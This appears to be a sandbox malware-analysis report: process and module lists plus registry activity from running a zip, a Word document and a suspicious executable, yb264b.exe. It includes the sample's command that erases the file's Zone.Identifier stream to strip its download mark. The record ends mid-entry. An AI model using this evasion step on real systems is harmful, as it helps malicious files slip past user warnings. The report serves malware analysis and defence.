c:\windows\assembly\nativeimages_v4.0.30319_32\system.web\7c32e936a07e0c7d9cae3ac27497f613\system.web.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.web.28b9ef5a#\a00ba16c92fd291e37a00bab4a72a3fe\system.web.extensions.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.serv759bfb78#\c37de755ec3ee73d604bc11f85599177\system.serviceprocess.ni.dll
c:\windows\system32\psapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.windows.forms\2dc6cfd856864312d563098f9486361c\system.windows.forms.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\bcrypt.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.v9921e851#\f971acbc25b64dfe4d70e5b25837c780\microsoft.visualbasic.ni.dll

PID
3192
CMD
"C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\admin\AppData\Roaming\yb264b.exe:Zone.Identifier"
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
yb264b.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2324
CMD
"C:\Program Files\Opera\opera.exe"
Path
C:\Program Files\Opera\opera.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Opera Software
Description
Opera Internet Browser
Version
1748
Modules
Image
c:\program files\opera\opera.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\program files\opera\opera.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winmm.dll
c:\windows\system32\version.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\profapi.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\devenum.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\avicap32.dll
c:\windows\system32\msvfw32.dll
c:\windows\system32\quartz.dll
c:\program files\adobe\acrobat reader dc\reader\browser\nppdf32.dll
c:\windows\system32\macromed\flash\npswf32_26_0_0_131.dll
c:\program files\java\jre1.8.0_92\bin\dtplugin\npdeployjava1.dll
c:\program files\java\jre1.8.0_92\bin\plugin2\npjp2.dll
c:\progra~1\micros~1\office14\npauthz.dll
c:\progra~1\micros~1\office14\npspwrap.dll
c:\program files\google\update\1.3.34.11\npgoogleupdate3.dll
c:\program files\videolan\vlc\npvlc.dll
c:\program files\adobe\acrobat reader dc\reader\air\nppdf32.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\userenv.dll

PID
3788
CMD
C:\Users\admin\AppData\Roaming\yb264b.exe
Path
C:\Users\admin\AppData\Roaming\yb264b.exe
Indicators
Parent process
yb264b.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
inigujesekaquguxol
Description
apigomir
Version
7.11.14.18
Modules
Image
c:\users\admin\appdata\roaming\yb264b.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\97e047cf68e9a7d90e196d072cd49cac\mscorlib.ni.dll
c:\windows\system32\ole32.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\system32\oleaut32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\e071297bb06faa961bef045ae5f25fdc\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\21a1606b6c00f9abe7db55c02e0f87c9\system.core.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.v9921e851#\f971acbc25b64dfe4d70e5b25837c780\microsoft.visualbasic.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.drawing\61dfb69c9ad6ed96809170d54d80b8a6\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.windows.forms\2dc6cfd856864312d563098f9486361c\system.windows.forms.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\sxs.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\custommarshalers\678932d0c6c5ff6417c634eea99931f0\custommarshalers.ni.dll
c:\windows\microsoft.net\assembly\gac_32\custommarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\custommarshalers.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\e588691224a17737f3a164cc2d46c156\system.management.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\wminet_utils.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.security\8391072310ccd84eecefe797cfd4a4a5\system.security.ni.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\mlang.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\vaultcli.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\7c8f75f367134a030cba4a127dc62a2f\system.xml.ni.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\cd03f9386e02f56502e01a25ddd7e0a7\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\credssp.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\secur32.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\userenv.dll
c:\windows\system32\gpapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll

Registry activity

Total events
2577
Read events
1785
Write events
791
Delete events
1

Modification events

PID
Process
Operation
Key
Name
Value
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2900
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\AppData\Local\Temp\Sample1.zip
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface
ShowPassword
0
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General
LastFolder
C:\Users\admin\AppData\Local\Temp
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
name
120
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
size
80
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
psize
80
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
type
120
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
mtime
100
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
crc
70
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_0
38000000730100000402000000000000D4D0C800000000000000000000000000640108000000000039000000B40200000000000001000000
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_1
38000000730100000500000000000000D4D0C800000000000000000000000000B2010C0000000000160000002A0000000000000002000000
2900
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_2
38000000730100000400000000000000D4D0C8000000000000000000000000002A0113000000000016000000640000000000000003000000
3164
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
rm:
726D3A005C0C0000010000000000000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1326252063
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1326252176
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1326252177
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
5C0C0000449B80CCEB51D50100000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
ln:
6C6E3A005C0C000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
fo:
666F3A005C0C000006000000010000004E000000020000003E0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C006100790079002E0064006F006300000000000000
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1326252178
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1326252179
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1326252033
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1326252033
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1326252034
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1326252034
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1326252035
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1326252035
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1326252036
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{909DE51C-2C65-4F31-98A3-1BEC2E3FB776}
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D551EBCDF46CD0][O00000000]*C:\Users\admin\Desktop\
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D551EBCDF6DDD0][O00000000]*C:\Users\admin\Desktop\ayy.doc
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\376EBD
376EBD
040000005C0C00001E00000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C006100790079002E0064006F006300070000006100790079002E0064006F0063000000000001000000000000008029C063EB51D501BD6E3700BD6E370000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Courier New
02070309020205020404
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Symbol
05050102010706020507
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings
05000000000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Mincho
02020609040205080304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Batang
02030600000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimSun
02010600030101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
PMingLiU
02020500000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Gothic
020B0609070205080204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Dotum
020B0600000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimHei
02010609060101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU
02020509000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gulim
020B0600000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century
02040604050505020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Angsana New
02020603050405020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cordia New
020B0304020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mangal
02040503050203030202
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Latha
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sylfaen
010A0502050306030303
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vrinda
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Raavi
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Shruti
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gautami
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tunga
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Estrangelo Edessa
03080600000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
02040503050406030204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Unicode MS
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tahoma
020B0604030504040204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Marlett
00000000000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Batang
02030600000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
BatangChe
02030609000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@BatangChe
02030609000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gungsuh
02030600000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Gungsuh
02030600000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
GungsuhChe
02030609000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@GungsuhChe
02030609000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DaunPenh
01010101010101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DokChampa
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Euphemia
020B0503040102020104
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vani
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Gulim
020B0600000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
GulimChe
020B0609000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@GulimChe
020B0609000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Dotum
020B0600000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DotumChe
020B0609000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DotumChe
020B0609000101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Impact
020B0806030902050204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Iskoola Pota
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kalinga
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kartika
02020503030404060203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Khmer UI
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lao UI
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Console
020B0609040504020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Malgun Gothic
020B0503020000020004
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Malgun Gothic
020B0503020000020004
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Meiryo
020B0604030504040204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Meiryo
020B0604030504040204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Meiryo UI
020B0604030504040204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Meiryo UI
020B0604030504040204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Himalaya
01010100010101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft JhengHei
020B0604030504040204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Microsoft JhengHei
020B0604030504040204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft YaHei
020B0503020204020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Microsoft YaHei
020B0503020204020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU
02020509000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@PMingLiU
02020500000000000000
3164
WINWORD.EXE
write
